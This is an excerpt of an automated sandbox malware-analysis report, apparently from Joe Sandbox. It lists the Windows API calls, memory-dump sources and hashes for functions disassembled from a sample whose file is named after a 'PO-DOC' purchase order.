                                                                                    • Opcode Fuzzy Hash: e5ec7e1c8d1df9b2f64c7af100e8cbce81fc4b633ab105468de6fbd9f05b65c7
                                                                                    • Instruction Fuzzy Hash: 5A4167759452199FDF12EFA4DD81ADEB7F9AF19340F1000E6E505EB142EB34AB88CB50
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001D2E1C
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001D2E4F
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001D2E84
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001D2EB6
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001D2EE0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001D2EF1
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001D2F0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 7cd90f536d84bcd3963fd8dc0456b310fd7c3470d3d7e1df17ba171260ee276b
                                                                                    • Instruction ID: 599472b55af0d19d54944a8898b2efecb5f8a8be3b66676a45c31f149ea7f1e9
                                                                                    • Opcode Fuzzy Hash: 7cd90f536d84bcd3963fd8dc0456b310fd7c3470d3d7e1df17ba171260ee276b
                                                                                    • Instruction Fuzzy Hash: DA3105306461519FDB21CF58EC88FA537E1EBAA711F1545A6FA208B3B1CB71E890DB41
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7769
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A778F
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001A7792
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001A77B0
                                                                                    • SysFreeString.OLEAUT32(?), ref: 001A77B9
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001A77DE
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001A77EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: e5132601d0a8c35231af8973f7d223a657499b7b44f90d637fc8cd0833b3a2e9
                                                                                    • Instruction ID: 88de10e42c907a80d393e6fed6835e77b85bad0b2f95360766c8257a8be7d223
                                                                                    • Opcode Fuzzy Hash: e5132601d0a8c35231af8973f7d223a657499b7b44f90d637fc8cd0833b3a2e9
                                                                                    • Instruction Fuzzy Hash: D221B27A605219AFDB10DFE8CC88CBB73ACEB0A3647008526F914DB191D770DD81C7A0
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7842
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7868
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001A786B
                                                                                    • SysAllocString.OLEAUT32 ref: 001A788C
                                                                                    • SysFreeString.OLEAUT32 ref: 001A7895
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001A78AF
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001A78BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: a64837a926d4f2b85174d32959f5ce508fb93aca83f3352494346476acd2c1ce
                                                                                    • Instruction ID: a8e81cfb9b40cd4e9fdfa3f12ac0d8572f335f68ebe95da47c56de110a16e64e
                                                                                    • Opcode Fuzzy Hash: a64837a926d4f2b85174d32959f5ce508fb93aca83f3352494346476acd2c1ce
                                                                                    • Instruction Fuzzy Hash: DE21A135609205AFDB109FA8DC88DBA77ECEF0A3607108525F915CB2A5D778DD81CBA4
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 001B04F2
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001B052E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandlePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 1424370930-2873401336
                                                                                    • Opcode ID: ee516f81dc173b006510a193077479a240b68e65e5d8811c6a61c144d5061278
                                                                                    • Instruction ID: 90de4555b2270155c55be678620d056b8cee4fea00072e14af72265ad60e11fc
                                                                                    • Opcode Fuzzy Hash: ee516f81dc173b006510a193077479a240b68e65e5d8811c6a61c144d5061278
                                                                                    • Instruction Fuzzy Hash: A9218DB1500306AFDB319F69DC44ADB77E4BF49724F204A19F8A1D66E0D7709980CF60
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 001B05C6
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001B0601
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandlePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 1424370930-2873401336
                                                                                    • Opcode ID: 643c95bdcf0ac325b924eabc8fa3f985079c205a3f52952327a18a68902f4248
                                                                                    • Instruction ID: 6096aaaf024e404108179e5c2b3a55de0286240fb15d65456655ba67c4956048
                                                                                    • Opcode Fuzzy Hash: 643c95bdcf0ac325b924eabc8fa3f985079c205a3f52952327a18a68902f4248
                                                                                    • Instruction Fuzzy Hash: B2214F755013169FDB219F69DC04ADB77E4BF99720F200B19F8A1E72E0E77099A0CB50
                                                                                    APIs
                                                                                      • Part of subcall function 0014600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
                                                                                      • Part of subcall function 0014600E: GetStockObject.GDI32(00000011), ref: 00146060
                                                                                      • Part of subcall function 0014600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001D4112
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001D411F
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001D412A
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001D4139
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001D4145
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 5a3680587d2b02b42eb68cb4aa0871562a94250c1586f0006afc0f3d1ee77b28
                                                                                    • Instruction ID: b90a277f43429b9b3a6bcea6516d566bbd3e181a8b342f77ba2e1a06a78c2ae2
                                                                                    • Opcode Fuzzy Hash: 5a3680587d2b02b42eb68cb4aa0871562a94250c1586f0006afc0f3d1ee77b28
                                                                                    • Instruction Fuzzy Hash: 321190B2150219BFEF118E64CC86EE77F6DEF19798F014111BB18A2190CB72AC61DBA4
                                                                                    APIs
                                                                                      • Part of subcall function 0017D7A3: _free.LIBCMT ref: 0017D7CC
                                                                                    • _free.LIBCMT ref: 0017D82D
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 0017D838
                                                                                    • _free.LIBCMT ref: 0017D843
                                                                                    • _free.LIBCMT ref: 0017D897
                                                                                    • _free.LIBCMT ref: 0017D8A2
                                                                                    • _free.LIBCMT ref: 0017D8AD
                                                                                    • _free.LIBCMT ref: 0017D8B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                    • Instruction ID: ae259239f3e1c0009e2af7f360a4a2288260ad55ff94029eca6c7b50c8104110
                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                    • Instruction Fuzzy Hash: 8A118171540B18AAD621BFF0DC07FCBBBFC6F60704F448825F29DA6092DB34B6464651
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001ADA74
                                                                                    • LoadStringW.USER32(00000000), ref: 001ADA7B
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001ADA91
                                                                                    • LoadStringW.USER32(00000000), ref: 001ADA98
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001ADADC
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 001ADAB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 4072794657-3128320259
                                                                                    • Opcode ID: cab72ff9c0cb3ef49c13b3ec1d49de5c2dae3b5c2ccf42da388e22ddd377ec29
                                                                                    • Instruction ID: 505afd17c910c338be188217bf10d8742dde712292ee7fb24846dc6b79b94105
                                                                                    • Opcode Fuzzy Hash: cab72ff9c0cb3ef49c13b3ec1d49de5c2dae3b5c2ccf42da388e22ddd377ec29
                                                                                    • Instruction Fuzzy Hash: 8A0186F6501219BFE7109BA0DD89EFB336CE709301F400992B706E2441EA749EC48FB4
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(00B7F198,00B7F198), ref: 001B097B
                                                                                    • EnterCriticalSection.KERNEL32(00B7F178,00000000), ref: 001B098D
                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 001B099B
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001B09A9
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001B09B8
                                                                                    • InterlockedExchange.KERNEL32(00B7F198,000001F6), ref: 001B09C8
                                                                                    • LeaveCriticalSection.KERNEL32(00B7F178), ref: 001B09CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 972ca35f5cf0dbbf21f57e283f0c5576fa51793031d804701e479ac399d78982
                                                                                    • Instruction ID: 1aa66b7094737d2a72707e7ddb6db4fc1b9989ad2949538c9f103dc07a735176
                                                                                    • Opcode Fuzzy Hash: 972ca35f5cf0dbbf21f57e283f0c5576fa51793031d804701e479ac399d78982
                                                                                    • Instruction Fuzzy Hash: 8BF0C932483A13BBDB525BA4EE89BD6BB29BF05706F402526F20290CA1C77594A5CFD0
                                                                                    APIs
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001C1DC0
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001C1DE1
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1DF2
                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 001C1EDB
                                                                                    • inet_ntoa.WSOCK32(?), ref: 001C1E8C
                                                                                      • Part of subcall function 001A39E8: _strlen.LIBCMT ref: 001A39F2
                                                                                      • Part of subcall function 001C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001BEC0C), ref: 001C3240
                                                                                    • _strlen.LIBCMT ref: 001C1F35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3203458085-0
                                                                                    • Opcode ID: c091624dcf7b5304b018879a7e90f2a785b5f513614597eccc2da1553af90233
                                                                                    • Instruction ID: 2fc6b36ae03b3846a35380dd8835f816a57aa8db31a6737b932f1cfb7acfdfbb
                                                                                    • Opcode Fuzzy Hash: c091624dcf7b5304b018879a7e90f2a785b5f513614597eccc2da1553af90233
                                                                                    • Instruction Fuzzy Hash: 2FB1C031244340AFC324DF64C895F2A77A5AFA6318F54894CF46A5F2A3CB31ED46CB92
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 00145D30
                                                                                    • GetWindowRect.USER32(?,?), ref: 00145D71
                                                                                    • ScreenToClient.USER32(?,?), ref: 00145D99
                                                                                    • GetClientRect.USER32(?,?), ref: 00145ED7
                                                                                    • GetWindowRect.USER32(?,?), ref: 00145EF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 74e07a93c35605fd6c0daea83a9662f7a99135cb37b7be01362427c55728a92d
                                                                                    • Instruction ID: 6ee8a133b0d981366a37c680d800d1e9b827b01a7edffa673a24a5f47c0b7f8a
                                                                                    • Opcode Fuzzy Hash: 74e07a93c35605fd6c0daea83a9662f7a99135cb37b7be01362427c55728a92d
                                                                                    • Instruction Fuzzy Hash: 89B17B35A0074ADBDB14DFA9C4807EEB7F2FF58310F14841AE8A9D7260DB34AA51DB54
                                                                                    APIs
                                                                                    • __allrem.LIBCMT ref: 001700BA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001700D6
                                                                                    • __allrem.LIBCMT ref: 001700ED
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017010B
                                                                                    • __allrem.LIBCMT ref: 00170122
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00170140
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 1992179935-0
                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                    • Instruction ID: b66069b34239fb593b31ecedcfb2b6004b575121753df8204644e4c2b4274f5f
                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                    • Instruction Fuzzy Hash: 50812972A00706EBE725AF68DC81B6B73F8AF55364F24813EF515D7281EB70DA418B50
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001682D9,001682D9,?,?,?,0017644F,00000001,00000001,8BE85006), ref: 00176258
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0017644F,00000001,00000001,8BE85006,?,?,?), ref: 001762DE
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001763D8
                                                                                    • __freea.LIBCMT ref: 001763E5
                                                                                      • Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852
                                                                                    • __freea.LIBCMT ref: 001763EE
                                                                                    • __freea.LIBCMT ref: 00176413
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 64689ff0d3cee6541079243c9420c965cd5b6c9e9161f84ca9c956d899a361f7
                                                                                    • Instruction ID: 316cde3967b888118ab99be07172af250fed35ca6b4497814ab1978f0315ec12
                                                                                    • Opcode Fuzzy Hash: 64689ff0d3cee6541079243c9420c965cd5b6c9e9161f84ca9c956d899a361f7
                                                                                    • Instruction Fuzzy Hash: 2B51E072A00A16ABEB298F64CC81EAF77B9EB58710F158629FC0DD6141EB34DC40D7A0
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CBCCA
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CBD25
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001CBD6A
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001CBD99
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001CBDF3
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001CBDFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 1120388591-0
                                                                                    • Opcode ID: bd35ec564f5cc6e1c6264c08d68fbd443a87ed62867b5cc1b8a8f7d19da5f130
                                                                                    • Instruction ID: a14a3b0b91426a912ee9e23068e8f323c201c63893b6292622aa09a8227caf66
